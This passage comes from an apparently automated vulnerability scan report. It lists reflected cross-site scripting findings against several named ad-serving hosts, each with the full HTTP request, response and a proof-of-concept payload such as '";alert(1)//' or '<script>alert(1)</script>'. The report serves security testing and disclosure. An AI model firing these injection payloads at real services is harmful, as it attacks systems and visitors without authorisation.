Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540075598&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 16:41:30 GMT
Pragma: no-cache
Content-Length: 4325
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?Z=300x250&e3fbf"-alert(1)-"b5702b8b71e=1&s=1209091&_salt=1090008792";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.40. http://ads.pointroll.com/PortalServe/ [flash parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f954"%3balert(1)//0685f976cd0 was submitted in the flash parameter. This input was echoed as 1f954";alert(1)//0685f976cd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=101f954"%3balert(1)//0685f976cd0&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=101f954";alert(1)//0685f976cd0&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.41. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f096"%3balert(1)//da375838548 was submitted in the r parameter. This input was echoed as 3f096";alert(1)//da375838548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.83308077603578573f096"%3balert(1)//da375838548 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.83308077603578573f096";alert(1)//da375838548&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.42. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bebe2"-alert(1)-"8184f578ad5 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$bebe2"-alert(1)-"8184f578ad5&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$bebe2"-alert(1)-"8184f578ad5&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.43. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b81e"%3balert(1)//6be3b67e9ff was submitted in the time parameter. This input was echoed as 7b81e";alert(1)//6be3b67e9ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-57b81e"%3balert(1)//6be3b67e9ff&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-57b81e";alert(1)//6be3b67e9ff&r=0.8330807760357857&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.44. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 479b2'%3balert(1)//4fedd6f1f24 was submitted in the admeld_adprovider_id parameter. This input was echoed as 479b2';alert(1)//4fedd6f1f24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567479b2'%3balert(1)//4fedd6f1f24&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 174

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567479b2';alert(1)//4fedd6f1f24&external_user_id=0&expiration=1305131482"/>');

1.45. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95419'%3balert(1)//eb12da10d08 was submitted in the admeld_callback parameter. This input was echoed as 95419';alert(1)//eb12da10d08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match95419'%3balert(1)//eb12da10d08 HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 174

document.write('<img width="0" height="0" src="http://tag.admeld.com/match95419';alert(1)//eb12da10d08?admeld_adprovider_id=567&external_user_id=0&expiration=1305131482"/>');

1.46. http://adserving.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c58a'-alert(1)-'95756830280 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x903c58a'-alert(1)-'95756830280&section=1836970&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:01:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:01:49 GMT
Content-Length: 410

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x903c58a'-alert(1)-'95756830280&inv_code=1836970&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x903c58a%27-alert%281%29-%2795756830280%26section%3D1836970%26
...[SNIP]...

1.47. http://adserving.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5742'-alert(1)-'b8bc09776c7 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1836970c5742'-alert(1)-'b8bc09776c7&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:01:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:01:53 GMT
Content-Length: 410

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1836970c5742'-alert(1)-'b8bc09776c7&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1836970c5742%27-alert%281%29-%27b8bc09776c7%26referrer%3Dhttp%3
...[SNIP]...

1.48. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4de2c'-alert(1)-'6b2a2793137 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=5323554de2c'-alert(1)-'6b2a2793137&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:20:17 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 553
Date: Mon, 11 Apr 2011 16:21:46 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...
_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=5323554de2c'-alert(1)-'6b2a2793137">
...[SNIP]...

1.49. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20d43'%3balert(1)//82d6def5476 was submitted in the mpvc parameter. This input was echoed as 20d43';alert(1)//82d6def5476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f20d43'%3balert(1)//82d6def5476 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 5:29:52 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 553
Date: Mon, 11 Apr 2011 16:21:48 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;~okv=;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?20d43';alert(1)//82d6def5476http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=532355">
...[SNIP]...

1.50. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99ce8'%3balert(1)//73fc8a370f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99ce8';alert(1)//73fc8a370f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f&99ce8'%3balert(1)//73fc8a370f3=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 5:02:10 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 556
Date: Mon, 11 Apr 2011 16:21:50 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;~okv=;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?&99ce8';alert(1)//73fc8a370f3=1http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=532355">
...[SNIP]...

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 73bbb<script>alert(1)</script>6a653815b0a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds73bbb<script>alert(1)</script>6a653815b0a&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
